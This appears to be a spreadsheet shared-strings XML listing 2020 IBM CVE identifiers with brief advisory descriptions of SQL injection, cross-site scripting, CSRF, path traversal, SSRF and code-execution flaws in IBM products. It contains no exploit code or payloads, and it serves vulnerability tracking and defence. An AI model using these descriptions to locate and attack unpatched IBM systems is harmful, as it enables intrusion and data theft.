    <t>IBM Sterling File Gateway 2.2.0.0 through 2.2.6.5 and 6.0.0.0 through 6.0.3.2 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database.</t>
  </si>
  <si>
    <t>CVE-2020-4648</t>
  </si>
  <si>
    <t>A vulnerability exsists in IBM Planning Analytics 2.0 whereby avatars in Planning Analytics Workspace could be modified by other users without authorization to do so. IBM X-Force ID: 186019.</t>
  </si>
  <si>
    <t>CVE-2020-4649</t>
  </si>
  <si>
    <t>IBM Planning Analytics Local 2.0.9.2 and IBM Planning Analytics Workspace 57 could expose data to non-privleged users by not invalidating TM1Web user sessions. IBM X-Force ID: 186022.</t>
  </si>
  <si>
    <t>CVE-2020-4650</t>
  </si>
  <si>
    <t>IBM Maximo Spatial Asset Management 7.6.0.3, 7.6.0.4, 7.6.0.5, and 7.6.1.0 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 186023.</t>
  </si>
  <si>
    <t>CVE-2020-4651</t>
  </si>
  <si>
    <t>IBM Maximo Spatial Asset Management 7.6.0.3, 7.6.0.4, 7.6.0.5, and 7.6.1.0 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 186024.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-4653</t>
  </si>
  <si>
    <t>IBM Planning Analytics 2.0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t>
  </si>
  <si>
    <t>CVE-2020-4654</t>
  </si>
  <si>
    <t>IBM Sterling File Gateway 2.2.0.0 through 6.1.1.0 could allow an authenticated user to obtain sensitive information due to improper permission control. IBM X-Force ID: 186090.</t>
  </si>
  <si>
    <t>CVE-2020-4655</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.0.3.2 and 5.2.0.0 through 5.2.6.5 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 186091.</t>
  </si>
  <si>
    <t>CVE-2020-4657</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator 5.2.0.0 through 6.0.3.2 Standard Edition is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 186094.</t>
  </si>
  <si>
    <t>CVE-2020-4658</t>
  </si>
  <si>
    <t>IBM Sterling File Gateway 2.2.0.0 through 6.0.3.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 186095.</t>
  </si>
  <si>
    <t>CVE-2020-4660</t>
  </si>
  <si>
    <t>IBM Security Access Manager 9.0.7 and IBM Security Verify Access 10.0.0 could allow an attacker to obtain sensitive using timing side channel attacks which could aid in further attacks against the system. IBM X-Force ID: 186140.</t>
  </si>
  <si>
    <t>CVE-2020-4661</t>
  </si>
  <si>
    <t>IBM Security Access Manager 9.0.7 and IBM Security Verify Access 10.0.0 could allow an attacker to obtain sensitive using timing side channel attacks which could aid in further attacks against the system. IBM X-Force ID: 186142.</t>
  </si>
  <si>
    <t>CVE-2020-4662</t>
  </si>
  <si>
    <t>IBM Event Streams 10.0.0 could allow an authenticated user to perform tasks to a schema due to improper authentication validation. IBM X-Force ID: 186233.</t>
  </si>
  <si>
    <t>CVE-2020-4663</t>
  </si>
  <si>
    <t>IBM Engineering Requirements Quality Assistant On-Premises is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 186234.</t>
  </si>
  <si>
    <t>CVE-2020-4664</t>
  </si>
  <si>
    <t>IBM Engineering Requirements Quality Assistant On-Premises is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 186235.</t>
  </si>
  <si>
    <t>CVE-2020-4665</t>
  </si>
  <si>
    <t>IBM Sterling File Gateway 2.2.0.0 through 2.2.6.5 and 6.0.0.0 through 6.0.3.2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86280.</t>
  </si>
  <si>
    <t>CVE-2020-4666</t>
  </si>
  <si>
    <t>IBM Engineering Requirements Quality Assistant On-Premises is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 186281.</t>
  </si>
  <si>
    <t>CVE-2020-4667</t>
  </si>
  <si>
    <t>IBM Engineering Requirements Quality Assistant On-Premises could allow an authenticated user to obtain sensitive information due to improper input validation. IBM X-Force ID: 186282.</t>
  </si>
  <si>
    <t>CVE-2020-4668</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.0.3.5, 6.1.0.0 through 6.1.0.3, and 6.1.1.0 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 186283.</t>
  </si>
  <si>
    <t>CVE-2020-4669</t>
  </si>
  <si>
    <t>IBM Planning Analytics Local 2.0 connects to a MongoDB server. MongoDB, a document-oriented database system, is listening on the remote port, and it is configured to allow connections without password authentication. A remote attacker can gain unauthorized access to the database. IBM X-Force ID: 184600.</t>
  </si>
  <si>
    <t>CVE-2020-4670</t>
  </si>
  <si>
    <t>IBM Planning Analytics Local 2.0 connects to a Redis server. The Redis server, an in-memory data structure store, running on the remote host is not protected by password authentication. A remote attacker can exploit this to gain unauthorized access to the server. IBM X-Force ID: 186401.</t>
  </si>
  <si>
    <t>CVE-2020-4671</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.0.3.2 and 5.2.0.0 through 5.2.6.5 stores potentially sensitive information in log files that could be read by an authenticatedl user. IBM X-Force ID: 186284.</t>
  </si>
  <si>
    <t>CVE-2020-4672</t>
  </si>
  <si>
    <t>IBM Business Automation Workflow 20.0.0.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 186285.</t>
  </si>
  <si>
    <t>CVE-2020-4673</t>
  </si>
  <si>
    <t>IBM Workload Automation 9.5 stores sensitive information in HTML comments that could aid in further attacks against the system. IBM X-Force ID: 186286.</t>
  </si>
  <si>
    <t>CVE-2020-4674</t>
  </si>
  <si>
    <t>IBM Workload Automation 9.5 stores the server path in URLs that could aid in further attacks against the system. IBM X-Force ID: 186287.</t>
  </si>
  <si>
    <t>CVE-2020-4675</t>
  </si>
  <si>
    <t>IBM InfoSphere Master Data Management Server 11.6 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 186324.</t>
  </si>
  <si>
    <t>CVE-2020-4678</t>
  </si>
  <si>
    <t>IBM Security Guardium 11.2 could allow an attacker with admin access to obtain and read files that they normally would not have access to. IBM X-Force ID: 186423.</t>
  </si>
  <si>
    <t>CVE-2020-4679</t>
  </si>
  <si>
    <t>IBM Security Guardium 11.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 186424.</t>
  </si>
  <si>
    <t>CVE-2020-4680</t>
  </si>
  <si>
    <t>IBM Security Guardium 11.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 186426.</t>
  </si>
  <si>
    <t>CVE-2020-4681</t>
  </si>
  <si>
    <t>IBM Security Guardium 11.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 186427.</t>
  </si>
  <si>
    <t>CVE-2020-4682</t>
  </si>
  <si>
    <t>IBM MQ 7.5, 8.0, 9.0, 9.1, 9.2 LTS, and 9.2 CD could allow a remote attacker to execute arbitrary code on the system, caused by an unsafe deserialization of trusted data. An attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 186509.</t>
  </si>
  <si>
    <t>CVE-2020-4685</t>
  </si>
  <si>
    <t>A low level user of IBM Cognos Controller 10.3.0, 10.3.1, 10.4.0, 10.4.1, and 10.4.2 who has Administration rights to the server where the application is installed, can escalate their privilege from Low level to Super Admin and gain access to Create/Update/Delete any level of user in Cognos Controller. IBM X-Force ID: 186625.</t>
  </si>
  <si>
    <t>CVE-2020-4686</t>
  </si>
  <si>
    <t>IBM Spectrum Virtualize 8.3.1 could allow a remote user authenticated via LDAP to escalate their privileges and perform actions they should not have access to. IBM X-Force ID: 186678.</t>
  </si>
  <si>
    <t>CVE-2020-4687</t>
  </si>
  <si>
    <t>IBM Content Navigator 3.0.7 and 3.0.8 could allow an authenticated user to view cached content of another user that they should not have access to. IBM X-Force ID: 186679.</t>
  </si>
  <si>
    <t>CVE-2020-4688</t>
  </si>
  <si>
    <t>IBM Security Guardium 10.6 and 11.2 could allow a local attacker to execute arbitrary commands on the system as an unprivileged user, caused by command injection vulnerability. IBM X-Force ID: 186700.</t>
  </si>
  <si>
    <t>CVE-2020-4689</t>
  </si>
  <si>
    <t>IBM Security Guardium 11.2 is vulnerable to CVS Injection. A remote privileged attacker could execute arbitrary commands on the system, caused by improper validation of csv file contents. IBM X-ForceID: 186696.</t>
  </si>
  <si>
    <t>CVE-2020-4690</t>
  </si>
  <si>
    <t>IBM Security Guardium 11.3 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. IBM X-Force ID: 186697.</t>
  </si>
  <si>
    <t>CVE-2020-4691</t>
  </si>
  <si>
    <t>IBM Jazz Foundation Products are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 186698.</t>
  </si>
  <si>
    <t>CVE-2020-4692</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.0.3.2 and 5.2.0.0 through 5.2.6.5 could allow an authenticated user to obtain sensitive information from the Dashboard UI. IBM X-Force ID: 186780.</t>
  </si>
  <si>
    <t>CVE-2020-4693</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Operations Center 7.1.0.000 through 7.1.10 and 8.1.0.000 through 8.1.9 may allow an attacker to execute arbitrary code on the system, caused by improper validation of data prior to export. IBM X-Force ID: 186782.</t>
  </si>
  <si>
    <t>CVE-2020-4695</t>
  </si>
  <si>
    <t>IBM API Connect V10 is impacted by insecure communications during database replication. As the data replication happens over insecure communication channels, an attacker can view unencrypted data leading to a loss of confidentiality.</t>
  </si>
  <si>
    <t>CVE-2020-4696</t>
  </si>
  <si>
    <t>IBM Cloud Pak for Security 1.3.0.1(CP4S) does not invalidate session after logout which could allow an authenticated user to obtain sensitive information from the previous session. IBM X-Force ID: 186789.</t>
  </si>
  <si>
    <t>CVE-2020-4697</t>
  </si>
  <si>
    <t>IBM Jazz Foundation products are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 186790.</t>
  </si>
  <si>
    <t>CVE-2020-4698</t>
  </si>
  <si>
    <t>IBM Business Process Manager 8.5, 8.6 and IBM Business Automation Workflow 18.0, 19.0, and 20.0 are vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 186841.</t>
  </si>
  <si>
    <t>CVE-2020-4699</t>
  </si>
  <si>
    <t>IBM Security Access Manager 9.0.7 and IBM Security Verify Access 10.0.0 could allow an attacker to obtain sensitive using timing side channel attacks which could aid in further attacks against the system. IBM X-Force ID: 186947.</t>
  </si>
  <si>
    <t>CVE-2020-4700</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.0.3.2 and 5.2.0.0 through 5.2.6.5 could allow an authenticated user belonging to a specific user group to create a user or group with administrative privileges. IBM X-Force ID: 187077.</t>
  </si>
  <si>
    <t>CVE-2020-4701</t>
  </si>
  <si>
    <t>IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to a buffer overflow, caused by improper bounds checking which could allow a local attacker to execute arbitrary code on the system with root privileges.</t>
  </si>
  <si>
    <t>CVE-2020-4702</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.7 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 187187.</t>
  </si>
  <si>
    <t>CVE-2020-4703</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.6 Administrative Console could allow an authenticated attacker to upload arbitrary files which could be execute arbitrary code on the vulnerable server. This vulnerability is due to an incomplete fix for CVE-2020-4470. IBM X-Force ID: 187188.</t>
  </si>
  <si>
    <t>CVE-2020-4704</t>
  </si>
  <si>
    <t>IBM Content Navigator 3.0CD is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 187189.</t>
  </si>
  <si>
    <t>CVE-2020-4705</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.0.3.2 and 5.2.0.0 through 5.2.6.5 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 187190.</t>
  </si>
  <si>
    <t>CVE-2020-4706</t>
  </si>
  <si>
    <t>IBM API Connect 5.0.0.0 through 5.0.8.10 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to inject HTTP HOST header, which will allow the attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 187194.</t>
  </si>
  <si>
    <t>CVE-2020-4707</t>
  </si>
  <si>
    <t>IBM API Connect 5.0.0.0 through 5.0.8.11 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 187370.</t>
  </si>
  <si>
    <t>CVE-2020-4708</t>
  </si>
  <si>
    <t>IBM Security Trusteer Pinpoint Detect 11.6.5 could disclose some information due to using a wildcard in the Access-Control-Allow-Origin header. IBM X-Force ID: 187371.</t>
  </si>
  <si>
    <t>CVE-2020-4711</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.6 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 187501.</t>
  </si>
  <si>
    <t>CVE-2020-4717</t>
  </si>
  <si>
    <t>A vulnerability exists in IBM SPSS Modeler Subscription Installer that allows a user with create symbolic link permission to write arbitrary file in another protected path during product installation. IBM X-Force ID: 187727.</t>
  </si>
  <si>
    <t>CVE-2020-4718</t>
  </si>
  <si>
    <t>IBM Jazz Reporting Service 6.0.6, 6.0.6.1, 7.0, and 7.0.1 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 187731.</t>
  </si>
  <si>
    <t>CVE-2020-4719</t>
  </si>
  <si>
    <t>The IBM Cloud APM 8.1.4 server will issue a DNS request to resolve any hostname specified in the Cloud Event Management Webhook URL configuration definition. This could enable an authenticated user with admin authorization to create DNS query strings that are not hostnames. IBM X-Force ID: 187861.</t>
  </si>
  <si>
    <t>CVE-2020-4721</t>
  </si>
  <si>
    <t>IBM i2 Analyst Notebook 9.2.0 and 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 187868.</t>
  </si>
  <si>
    <t>CVE-2020-4722</t>
  </si>
  <si>
    <t>IBM i2 Analyst Notebook 9.2.0 and 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 187870.</t>
  </si>
  <si>
    <t>CVE-2020-4723</t>
  </si>
  <si>
    <t>IBM i2 Analyst Notebook 9.2.0 and 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 187873.</t>
  </si>
  <si>
    <t>CVE-2020-4724</t>
  </si>
  <si>
    <t>IBM i2 Analyst Notebook 9.2.0 and 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system.</t>
  </si>
  <si>
    <t>CVE-2020-4725</t>
  </si>
  <si>
    <t>IBM Monitoring (IBM Cloud APM 8.1.4 ) could allow an authenticated user to modify HTML content by sending a specially crafted HTTP request to the APM UI, which could mislead another user. IBM X-Force ID: 187974.</t>
  </si>
  <si>
    <t>CVE-2020-4726</t>
  </si>
  <si>
    <t>The IBM Application Performance Monitoring UI (IBM Cloud APM 8.1.4) allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 187975.</t>
  </si>
  <si>
    <t>CVE-2020-4727</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.7 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim.</t>
  </si>
  <si>
    <t>CVE-2020-4731</t>
  </si>
  <si>
    <t>IBM Aspera Web Application 1.9.14 PL1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 188055.</t>
  </si>
  <si>
    <t>CVE-2020-4732</t>
  </si>
  <si>
    <t>IBM Jazz Foundation and IBM Engineering products could allow an authenticated user to obtain sensitive information due to lack of security restrictions. IBM X-Force ID: 188126.</t>
  </si>
  <si>
    <t>CVE-2020-4733</t>
  </si>
  <si>
    <t>IBM Jazz Foundation products are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 188127.</t>
  </si>
  <si>
    <t>CVE-2020-4739</t>
  </si>
  <si>
    <t>IBM DB2 Accessories Suite for Linux, UNIX, and Windows, DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5 could allow a local authenticated attacker to execute arbitrary code on the system, caused by DLL search order hijacking vulnerability in Microsoft Windows client. By placing a specially crafted file in a compromised folder, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 188149.</t>
  </si>
  <si>
    <t>CVE-2020-4740</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.5 and 11.7 is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site. IBM X-Force ID: 188150.</t>
  </si>
  <si>
    <t>CVE-2020-4741</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.5 and 11.7 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 188197.</t>
  </si>
  <si>
    <t>CVE-2020-4747</t>
  </si>
  <si>
    <t>IBM Connect:Direct for UNIX 6.1.0, 6.0.0, 4.3.0, and 4.2.0 can allow a local or remote user to obtain an authenticated CLI session due to improper authentication methods. IBM X-Force ID: 188516.</t>
  </si>
  <si>
    <t>CVE-2020-4748</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 5.0.0 through 5.0.5.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 188517.</t>
  </si>
  <si>
    <t>CVE-2020-4749</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 5.0.0 through 5.0.5.2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88518.</t>
  </si>
  <si>
    <t>CVE-2020-4755</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 5.0.0 through 5.0.5.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 188595.</t>
  </si>
  <si>
    <t>CVE-2020-4756</t>
  </si>
  <si>
    <t>IBM Spectrum Scale V4.2.0.0 through V4.2.3.23 and V5.0.0.0 through V5.0.5.2 as well as IBM Elastic Storage System 6.0.0 through 6.0.1.0 could allow a local attacker to invoke a subset of ioctls on the device with invalid arguments that could crash the keneral and cause a denial of service. IBM X-Force ID: 188599.</t>
  </si>
  <si>
    <t>CVE-2020-4757</t>
  </si>
  <si>
    <t>IBM FileNet Content Manager and IBM Content Navigator 3.0.CD is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 188600.</t>
  </si>
  <si>
    <t>CVE-2020-4759</t>
  </si>
  <si>
    <t>IBM FileNet Content Manager 5.5.4 and 5.5.5 is potentially vulnerable to CVS Injection. A remote attacker could execute arbitrary commands on the system, caused by improper validation of csv file contents. IBM X-Force ID: 188736.</t>
  </si>
  <si>
    <t>CVE-2020-4760</t>
  </si>
  <si>
    <t>IBM Content Navigator 3.0CD is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 188737.</t>
  </si>
  <si>
    <t>CVE-2020-4761</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 5.2.6.5_2, 6.0.0.0 through 6.0.3.2, and 6.1.0.0 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 188895.</t>
  </si>
  <si>
    <t>CVE-2020-4762</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 5.2.6.5_2, 6.0.0.0 through 6.0.3.2, and 6.1.0.0 could allow an authenticated user to create a privileged account due to improper access controls. IBM X-Force ID: 188896.</t>
  </si>
  <si>
    <t>CVE-2020-4763</t>
  </si>
  <si>
    <t>IBM Sterling File Gateway 6.0.0.0 through 6.0.3.2 and 2.2.0.0 through 2.2.6.5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88897.</t>
  </si>
  <si>
    <t>CVE-2020-4764</t>
  </si>
  <si>
    <t>IBM Planning Analytics 2.0 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 188898.</t>
  </si>
  <si>
    <t>CVE-2020-4765</t>
  </si>
  <si>
    <t>IBM Cloud Pak for Multicloud Management prior to 2.3 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 188902.</t>
  </si>
  <si>
    <t>CVE-2020-4766</t>
  </si>
  <si>
    <t>IBM MQ Internet Pass-Thru 2.1 and 9.2 could allow a remote user to cause a denial of service by sending malformed MQ data requests which would consume all available resources. IBM X-Force ID: 188093.</t>
  </si>
  <si>
    <t>CVE-2020-4767</t>
  </si>
  <si>
    <t>IBM Sterling Connect Direct for Microsoft Windows 4.7, 4.8, 6.0, and 6.1 could allow a remote attacker to cause a denial of service, caused by a buffer over-read. Bysending a specially crafted request, the attacker could cause the application to crash. IBM X-Force ID: 188906.</t>
  </si>
  <si>
    <t>CVE-2020-4768</t>
  </si>
  <si>
    <t>IBM Case Manager 5.2 and 5.3 and IBM Business Automation Workflow 18.0, 19.0, and 20.0 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 188907.</t>
  </si>
  <si>
    <t>CVE-2020-4771</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Operations Center 8.1.0.000 through 8.1.10.and 7.1.0.000 through 7.1.11 could allow a remote attacker to obtain sensitive information, caused by improper authentication of a websocket endpoint. By using known tools to subscribe to the websocket event stream, an attacker could exploit this vulnerability to obtain sensitive information. IBM X-Force ID: 188993.</t>
  </si>
  <si>
    <t>CVE-2020-4772</t>
  </si>
  <si>
    <t>An XML External Entity Injection (XXE) vulnerability may impact IBM Curam Social Program Management 7.0.9 and 7.0.10. A remote attacker could exploit this vulnerability to expose sensitive information, denial of service, server side request forgery or consume memory resources. IBM X-Force ID: 189150.</t>
  </si>
  <si>
    <t>CVE-2020-4773</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) vulnerability may impact IBM Curam Social Program Management 7.0.9 and 7.0.10, which is an attack that forces a user to execute unwanted actions on the web application while they are currently authenticated. This applies to a single server class only, with no impact to remainder of web application. IBM X-Force ID: 189151.</t>
  </si>
  <si>
    <t>CVE-2020-4774</t>
  </si>
  <si>
    <t>An XPath vulnerability may impact IBM Curam Social Program Management 7.0.9 and 7.0.10, caused by the improper handling of user-supplied input. By sending a specially-crafted input, a remote attacker could exploit this vulnerability to obtain unauthorized access or reveal sensitive information such as XML document structure and content. IBM X-Force ID: 189152.</t>
  </si>
  <si>
    <t>CVE-2020-4775</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability may impact IBM Curam Social Program Management 7.0.9 and 7.0.10. This vulnerability allows attackers to inject malicious scripts into web applications for the purpose of running unwanted actions on the end user's device, restricted to a single location. IBM X-Force ID: 189153.</t>
  </si>
  <si>
    <t>CVE-2020-4776</t>
  </si>
  <si>
    <t>A path traversal vulnerability may impact IBM Curam Social Program Management 7.0.9 and 7.0.10, which could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted file path in URL request to view arbitrary files on the system. IBM X-Force ID: 189154.</t>
  </si>
  <si>
    <t>CVE-2020-4778</t>
  </si>
  <si>
    <t>IBM Curam Social Program Management 7.0.9 and 7.0.10 uses MD5 algorithm for hashing token in a single instance which less safe than default SHA-256 cryptographic algorithm used throughout the CÃºram application. IBM X-Force ID: 189156.</t>
  </si>
  <si>
    <t>CVE-2020-4779</t>
  </si>
  <si>
    <t>A HTTP Verb Tampering vulnerability may impact IBM Curam Social Program Management 7.0.9 and 7.0.10. By sending a specially-crafted request, an attacker could exploit this vulnerability to bypass security access controls. IBM X-Force ID: 189156.</t>
  </si>
  <si>
    <t>CVE-2020-4780</t>
  </si>
  <si>
    <t>OOTB build scripts does not set the secure attribute on session cookie which may impact IBM Curam Social Program Management 7.0.9 and 7.0,10. The purpose of the 'secure' attribute is to prevent cookies from being observed by unauthorized parties. IBM X-Force ID: 189158.</t>
  </si>
  <si>
    <t>CVE-2020-4781</t>
  </si>
  <si>
    <t>An improper input validation before calling java readLine() method may impact IBM Curam Social Program Management 7.0.9 and 7.0.10, which could result in a denial of service. IBM X-Force ID: 189159.</t>
  </si>
  <si>
    <t>CVE-2020-4782</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system.</t>
  </si>
  <si>
    <t>CVE-2020-4783</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Plus 10.1.0 through 10.1.6 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 189214.</t>
  </si>
  <si>
    <t>CVE-2020-4785</t>
  </si>
  <si>
    <t>IBM App Connect Enterprise Certified Container 1.0.0, 1.0.1, 1.0.2, 1.0.3, and 1.0.4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89219.</t>
  </si>
  <si>
    <t>CVE-2020-4786</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.4.2 GA to 7.4.2 Patch 1, 7.4.0 to 7.4.1 Patch 1, and 7.3.0 to 7.3.3 Patch 5 is vulnerable to server side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 189221.</t>
  </si>
  <si>
    <t>CVE-2020-4787</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.4.2 GA to 7.4.2 Patch 1, 7.4.0 to 7.4.1 Patch 1, and 7.3.0 to 7.3.3 Patch 5 is vulnerable to server side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 189224.</t>
  </si>
  <si>
    <t>CVE-2020-4788</t>
  </si>
  <si>
    <t>IBM Power9 (AIX 7.1, 7.2, and VIOS 3.1) processors could allow a local user to obtain sensitive information from the data in the L1 cache under extenuating circumstances. IBM X-Force ID: 189296.</t>
  </si>
  <si>
    <t>CVE-2020-4789</t>
  </si>
  <si>
